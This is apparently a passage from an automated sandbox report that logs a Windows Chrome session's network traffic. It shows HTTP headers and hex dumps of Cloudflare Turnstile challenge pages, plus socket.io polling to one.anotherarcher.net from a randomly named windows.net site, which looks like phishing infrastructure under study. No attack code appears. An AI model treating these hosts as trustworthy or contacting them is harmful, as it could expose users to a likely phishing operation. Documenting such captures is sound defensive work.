                                                                                                                                                                                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                document-policy: js-profiling
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                                                                                                referrer-policy: same-origin
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 63 66 64 38 30 35 61 39 63 64 34 32 35 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: Server: cloudflareCF-RAY: 8ccfd805a9cd425d-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                                                                                                                                                                                Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                                                                                                                                                                                Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                                                                                                                                                                                Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                                                                                                                                                                                Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                                                                                                                                                                                Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                                                                                                                                                                                Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                                                                                                                                                                                Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                                                                                                                                                                                Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                70192.168.2.44982979.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC668OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB3bm&sid=V0SbaC7hwW_9JHUoAANU HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC223INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:19 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1INData Raw: 31
                                                                                                                                                                                                                                Data Ascii: 1


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                71192.168.2.449831104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8ccfd7ea7f73238a/1727989036537/D-jJSXgtibOEtnj HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/dw9y9/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:19 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd807bf807cea-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 47 00 00 00 52 08 02 00 00 00 89 c9 5e 60 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDRGR^`IDAT$IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                72192.168.2.44983279.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB3JO&sid=V0SbaC7hwW_9JHUoAANU HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC175INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:19 GMT
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                73192.168.2.44983379.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB3JN&sid=V0SbaC7hwW_9JHUoAANU HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:19 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                74192.168.2.449834104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd805a9cd425d&lang=auto HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7i029/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:19 GMT
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 117746
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd80b6bd6de96-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                                                                                                                                                                2024-10-03 20:57:19 UTC1369INData Raw: 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 6f 75 74 64 61 74
                                                                                                                                                                                                                                Data Ascii: tile_footer_privacy":"Privacy","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","outdat
